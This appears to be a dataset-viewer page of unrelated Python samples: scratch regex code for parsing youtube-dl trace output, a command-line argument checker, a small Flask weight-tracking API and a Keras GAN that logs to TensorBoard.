    # calrgx = re.compile(r"(?P<indented_function>^\s*=\>\s[<>A-z0-9_-]+)\((?P<argname>\.\d+)=(?P<argval><[^>]+>)\)$")
    calrgx = re.compile(r"(?P<indented_function>^\s*=\>\s[<>A-z0-9_-]+)\((?P<argvars>.*?)\)$")
    excrgx = re.compile(r"(?P<indented_function>^\s*\<=\s[<>A-z0-9_-]+):\s\[(?P<retvals>[^]]+)\]$")
    retrgx = re.compile(r"(?P<indented_function>^\s*\s!\s[<>A-z0-9_-]+):\s\[(?P<retvals>[^]]+)\]$")
    print(11)  # debug marker
    if '=>' in call_datum:
      print(22)
      # call: '{COLOR}=>{NORMAL} {}({}{COLOR}{NORMAL}){RESET}\n'
      m = calrgx.match(call_datum)
      gd = m.groupdict()
      indented_function,argvars = gd.values()
      # print(f'{call_datum=}')
      # print(f"{indented_function=}")
      fmtd_cell_data = classify_whether_argvars_verbose(indented_function, argvars)
      return fmtd_cell_data
      # if m1 := calrgx1.match(call_datum):
      #   print('a')
      #   gd1 = m1.groupdict()
      #   indented_function,argvars = gd1.values()
      #   keyslst,valslst = [argname],[argval] # keep consistent with verbose
      #   fmtd_cell_data = FmtdCallData(indented_function,keyslst,valslst)
      #   return fmtd_cell_data
      # print('b')
    elif '<=' in call_datum:
      print(33)
      # return: '{COLOR}<={NORMAL} {}: {RESET}{}\n',
      if m2 := excrgx.match(call_datum):
        gd2 = m2.groupdict()
        indented_function,retvals = gd2.values()
        retvalslst = [retvals] # keep consistent with verbose
        fmtd_cell_data = FmtdReturnData(indented_function,retvalslst)
        return fmtd_cell_data
    elif ' !' in call_datum:
      print(44)
      # exception: '{COLOR} !{NORMAL} {}: {RESET}{}\n',
      if m3 := retrgx.match(call_datum):
        gd3 = m3.groupdict()
        indented_function,retvals = gd3.values()
        retvalslst = [retvals] # keep consistent with verbose
        fmtd_cell_data = FmtdExceptionData(indented_function,retvalslst)
        return fmtd_cell_data
    print(55)
    # NOTE(review): unbound if no branch above matched/returned.
    return fmtd_cell_data
  # Unpack the dataframe row; only call_data is used below.
  Index,filepath,line_number,symbol,event_kind,call_data,snoop_data = row
  call_datum = call_data[0]
  fmtd_data = prep_clean_classify_format(call_datum)
  assert isinstance(call_data,list), type(call_data)
  return fmtd_data
def initdf(initdf):
    """Patch two filepath ranges in the dataframe and return its 4th-from-last row tuple.

    NOTE(review): the parameter shadows the function's own name, and the
    chained ``.iloc[...].filepath = ...`` assignments act on an intermediate
    object (pandas chained assignment) -- they may not modify ``initdf``
    in place; confirm against a SettingWithCopyWarning.
    """
    initdf.iloc[10:14,0].filepath = 'extractor/__init__.py'
    initdf.iloc[14:16,:].filepath = 'downloader/__init__.py'
    initdflst = list(initdf.itertuples())
    idflm4 = initdflst[-4]
    # print(idflm4)
    return idflm4
def par(cd):
    """Parse a traced call line into its indented name and argvars parts.

    NOTE(review): scratch code -- it ignores its ``cd`` parameter and reads
    the undefined global ``row``; ``pargvars`` and ``parse_argvars`` are not
    defined in this file; and nothing is returned.  Calling it as-is raises
    NameError.
    """
    call_data = row.call_data
    call_datum = call_data[0]
    rgx=re.compile(r"^(?P<indented_filename>\s+=\>\s[A-z0-9-_]+)\((?P<argvars>.*)\)$")
    m = rgx.match(call_datum)
    gd = m.groupdict()
    indented_filename, argvars = gd.values()
    # Quote one specific repr so it survives downstream literal parsing.
    argvars2 = re.sub(r" <youtube_dl.utils.DateRange object at 0x111ed26a0>,",
                      r" '<youtube_dl.utils.DateRange object at 0x111ed26a0>', ",
                      argvars)
    pargDvars = pargvars(argvars2)
    argvars3 = parse_argvars(argvars2)
if __name__ == "__main__":
  # NOTE(review): the lines that defined ``row``/``call_datum`` are commented
  # out, so ``par(call_datum)`` below raises NameError as-is; ``par`` also
  # returns None, so the unpack would fail.  This is scratch/debug driver code.
  # dfpath = Path('/Users/alberthan/VSCodeProjects/vytd/src/youtube-dl/bin/tfdf/idf.pkl')
  # idf = pd.read_pickle(dfpath)
  # row = initdf(idf)
  # call_data = row.call_data
  kl,vl = parsed = par(call_datum)
  print(f"{len(kl)=}");print(f"{len(vl)=}")
  print(f"{kl=}")
  print(f"{len(kl[0])=}");print(f"{len(vl[0])=}")
  # print(parsed[0]) # ['', '>get_suitable_downloader']
  # print(parsed[1][0]
  # st()
  # parsed = process_verbose_row(row)
  # print(dir(parsed))
  # print(parsed.funcname)
  # print(parsed.fmtd_data)
  # print(parsed.fmtd_datac)
  # print(parsed.args_keys)
  # info_dict, idval= parsed.get_arg('info_dict')
  # params, parval= parsed.get_arg('params')
  # print(idval)
  # print(parval)
  # info_dict, idval= parsed.get_arg('info_dict',color=True)
  # params, parval= parsed.get_arg('params',color=True)
  # print(idval)
  # print(parval)
|
import sys
def error(msg):
    """Print the error message to stderr and quit the program with exit status 1."""
    sys.exit(msg)
args = sys.argv[1:]  # sys.argv[0] is the name of the python script itself
try:
    arg1 = int(args[0])  # must parse as an integer (raises ValueError otherwise)
    arg2 = args[1]
    arg3 = args[2]  # missing positional args raise IndexError
    print("Everything okay!")
except ValueError:
    error("First argument must be integer type!")
except IndexError:
    error("Requires 3 arguments!")
from flask import Flask,jsonify,request,render_template
from flask_cors import CORS
# Serve static files from /assets; CORS enabled because the API is consumed
# by a separate front end.
app = Flask(__name__, static_url_path='/assets')
CORS(app)
# In-memory store of daily weight records: ISO date plus max/min weight.
listBerat = [
    {'tanggal':'2018-08-22', 'max':50, 'min':49},
    {'tanggal':'2018-08-21', 'max':49, 'min':49},
    {'tanggal':'2018-08-20', 'max':52, 'min':50},
    {'tanggal':'2018-08-19', 'max':51, 'min':50},
    {'tanggal':'2018-08-18', 'max':50, 'min':48}
]
# @app.route('/')
# def home():
# return render_template('index.html')
# @app.route('/update')
# def update():
# return render_template('update.html')
# @app.route('/detail')
# def detail():
# return render_template('detail.html')
#get /store
@app.route('/berat')
def get_list():
    """Return every weight record, or a zeroed placeholder record when none exist."""
    if not listBerat:
        return jsonify({'tanggal':'0000-00-00', 'max':0, 'min':0})
    return jsonify(listBerat)
#mengambil list data
@app.route('/berat/<string:tanggal>')
def get_berat(tanggal):
    """Return the weight record for *tanggal*, or a not-found message."""
    record = next((b for b in listBerat if b['tanggal'] == tanggal), None)
    if record is not None:
        return jsonify(record)
    return jsonify({'message': 'data not found'})
#tambah/edit data
@app.route('/berat', methods=['POST'])
def tambah_data():
    """Create a record from the posted JSON, or update the record with the same date."""
    payload = request.get_json()
    new_data = {
        'tanggal': payload['tanggal'],
        'max': int(payload['max']),
        'min': int(payload['min'])
    }
    # Same date already stored: merge in place instead of appending.
    existing = next((b for b in listBerat if b['tanggal'] == new_data['tanggal']), None)
    if existing is not None:
        existing.update(new_data)
        return jsonify(new_data)
    listBerat.append(new_data)
    return jsonify(new_data)
#menghapus data
@app.route('/hapus', methods=['POST'])
def delete_data():
    """Remove every record whose date matches the posted JSON's 'tanggal'."""
    global listBerat
    tanggal = request.get_json()['tanggal']
    listBerat = [b for b in listBerat if b['tanggal'] != tanggal]
    return 'item deleted'
@app.route('/ratarata')
def ratarata():
    """Return the average max and min weight over all records (zeros when empty)."""
    if len(listBerat) == 0:
        return jsonify({'max':0, 'min':0})
    # Renamed from ``max``/``min``, which shadowed the builtins.
    maxes = [l['max'] for l in listBerat]
    mins = [l['min'] for l in listBerat]
    return jsonify({'max': sum(maxes)/len(maxes), 'min': sum(mins)/len(mins)})
app.run(host='0.0.0.0', port=5544)  # dev server, listening on all interfaces
|
import io
from keras.models import Model
from keras.layers import Dense, Input
from matplotlib import pyplot
import numpy as np
import tensorflow as tf
import time
def discriminator():
    """Build the discriminator: 2 inputs -> Dense(25, ReLU, He-uniform init) -> sigmoid score."""
    inputs = Input(shape=(2,), name='input_sample')
    # Single hidden layer, then a sigmoid probability output.
    hidden = Dense(25, activation="relu", kernel_initializer="he_uniform", name="dense1")(inputs)
    score = Dense(1, activation="sigmoid", name="output")(hidden)
    return Model(inputs=inputs, outputs=score)
def generator(latent_dim):
    """Build the generator: latent_dim inputs -> Dense(15, ReLU, He-uniform init) -> 2 linear outputs."""
    inputs = Input(shape=(latent_dim,), name='input_sample')
    # Single hidden layer, then a linear 2-D sample output.
    hidden = Dense(15, activation="relu", kernel_initializer="he_uniform", name="dense1")(inputs)
    sample = Dense(2, activation="linear", name="output")(hidden)
    return Model(inputs=inputs, outputs=sample)
class GAN(object):
    """Minimal GAN over 2-D samples: trains a generator against a
    discriminator with separate Adam optimizers, logging losses,
    accuracies and periodic scatter plots to TensorBoard.

    Fix: the discriminator's output layer uses a sigmoid activation, so the
    binary cross-entropy loss is built with ``from_logits=False``; the
    original ``from_logits=True`` applied a second sigmoid inside the loss,
    distorting both the generator and discriminator losses.
    """

    def __init__(self, epochs, batch_size, latent_dim, d_learning_rate, g_learning_rate, logdir):
        self.epochs = epochs
        self.batch_size = batch_size
        self.latent_dim = latent_dim
        # One optimizer per network so the learning rates can differ.
        self.d_optimizer = tf.keras.optimizers.Adam(learning_rate=d_learning_rate)
        self.g_optimizer = tf.keras.optimizers.Adam(learning_rate=g_learning_rate)
        self.logdir = logdir
        self.discriminator = discriminator()
        self.generator = generator(latent_dim)
        # The discriminator emits sigmoid probabilities, not logits.
        self.loss_fn = tf.keras.losses.BinaryCrossentropy(from_logits=False)
        # Accuracy trackers (overall and per sample source).
        self.g_accuracy = tf.keras.metrics.BinaryAccuracy()
        self.d_accuracy = tf.keras.metrics.BinaryAccuracy()
        self.d_real_accuracy = tf.keras.metrics.BinaryAccuracy()
        self.d_generated_accuracy = tf.keras.metrics.BinaryAccuracy()

    def generator_loss(self, generated_output):
        # The generator wants its fakes scored as real (label 1).
        return self.loss_fn(tf.ones_like(generated_output), generated_output)

    def discriminator_loss(self, real_output, generated_output):
        # Real samples should score 1, generated samples 0.
        real_loss = self.loss_fn(tf.ones_like(real_output), real_output)
        generated_loss = self.loss_fn(tf.zeros_like(generated_output), generated_output)
        total_loss = real_loss + generated_loss
        return total_loss

    def generator_accuracy(self, generated_output):
        # Fraction of fakes the discriminator scored as real.
        self.g_accuracy.reset_states()
        return self.g_accuracy(tf.ones_like(generated_output), generated_output)

    def discriminator_accuracy(self, real_output, generated_output):
        # Overall discriminator accuracy over reals (label 1) and fakes (label 0).
        self.d_accuracy.reset_states()
        return self.d_accuracy(tf.concat([tf.ones_like(real_output), tf.zeros_like(generated_output)], 0),
                               tf.concat([real_output, generated_output], 0))

    def discriminator_real_accuracy(self, real_output):
        # Accuracy at classifying real samples as real.
        self.d_real_accuracy.reset_states()
        return self.d_real_accuracy(tf.ones_like(real_output), real_output)

    def discriminator_generated_accuracy(self, generated_output):
        # Accuracy at classifying generated samples as fake.
        self.d_generated_accuracy.reset_states()
        return self.d_generated_accuracy(tf.zeros_like(generated_output), generated_output)

    def train_step(self, real_samples):
        """Run one adversarial update on a single batch of real samples.

        Returns (gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc).
        """
        # Sample latent-space points for this batch.
        random_latent_vectors = tf.random.normal(shape=(self.batch_size, self.latent_dim))
        with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
            # Generate fakes and score both populations.
            generated_samples = self.generator(random_latent_vectors)
            real_output = self.discriminator(real_samples)
            generated_output = self.discriminator(generated_samples)
            # Losses.
            gen_loss = self.generator_loss(generated_output)
            disc_loss = self.discriminator_loss(real_output, generated_output)
            # Metrics.
            gen_acc = self.generator_accuracy(generated_output)
            disc_acc = self.discriminator_accuracy(real_output, generated_output)
            disc_real_acc = self.discriminator_real_accuracy(real_output)
            disc_gen_acc = self.discriminator_generated_accuracy(generated_output)
        # Gradients of each loss w.r.t. its own network's trainable variables.
        gradients_of_generator = gen_tape.gradient(gen_loss,
                                                   self.generator.trainable_variables)
        gradients_of_discriminator = disc_tape.gradient(disc_loss,
                                                        self.discriminator.trainable_variables)
        # One gradient-descent step per network.
        self.g_optimizer.apply_gradients(zip(gradients_of_generator,
                                             self.generator.trainable_variables))
        self.d_optimizer.apply_gradients(zip(gradients_of_discriminator,
                                             self.discriminator.trainable_variables))
        return gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc

    def train(self, dataset):
        """Train for ``self.epochs`` epochs over ``dataset``; return per-epoch wall times."""
        file_writer = tf.summary.create_file_writer(self.logdir)
        file_writer.set_as_default()
        time_list = []
        for epoch in range(self.epochs):
            start_time = time.time()
            # One adversarial step per batch of real samples.
            for real_samples in dataset:
                gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc = self.train_step(real_samples)
            wall_time_sec = time.time() - start_time
            time_list.append(wall_time_sec)
            template = 'Epoch {}, Generator loss {}, Discriminator Loss {}, Generator accuracy {}, Discriminator accuracy {}, Discriminator real accuracy {}, Discriminator fake accuracy {}'
            print (template.format(epoch, gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc))
            # Log losses and accuracies (values from the epoch's last batch).
            tf.summary.scalar('1. Generator loss', gen_loss, step=epoch)
            tf.summary.scalar('2. Discriminator loss', disc_loss, step=epoch)
            tf.summary.scalar('3. Generator accuracy', gen_acc, step=epoch)
            tf.summary.scalar('4. Discriminator accuracy', disc_acc, step=epoch)
            tf.summary.scalar('5. Discriminator real accuracy', disc_real_acc, step=epoch)
            tf.summary.scalar('6. Discriminator fake accuracy', disc_gen_acc, step=epoch)
            # Every 49 epochs (epochs 0, 49, 98, ...) log a scatter plot of
            # real (red) vs generated (blue) samples.
            if (epoch) % 49 == 0:
                # Two batches of real samples vs 100 freshly generated ones.
                real_samples = np.concatenate([x for x in dataset.take(2)], axis=0)
                random_latent_vectors = tf.random.normal(shape=(100, self.latent_dim))
                generated_samples = np.array(self.generator(random_latent_vectors))
                fig = pyplot.figure()
                ax2 = pyplot.axes()
                ax2.scatter(real_samples[:, 0], real_samples[:, 1], c="red")
                ax2.scatter(generated_samples[:, 0], generated_samples[:, 1], c="blue")
                tf.summary.image("Output generator", plot_to_image(fig), step=(epoch+1))
        return time_list
def plot_to_image(figure):
    """Convert a matplotlib figure into a batched TF image tensor (via PNG)."""
    # Render the figure into an in-memory PNG buffer and close it.
    buffer = io.BytesIO()
    pyplot.savefig(buffer, format='png')
    pyplot.close(figure)
    buffer.seek(0)
    # Decode the PNG bytes (RGBA) and prepend a batch dimension.
    image = tf.image.decode_png(buffer.getvalue(), channels=4)
    return tf.expand_dims(image, 0)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.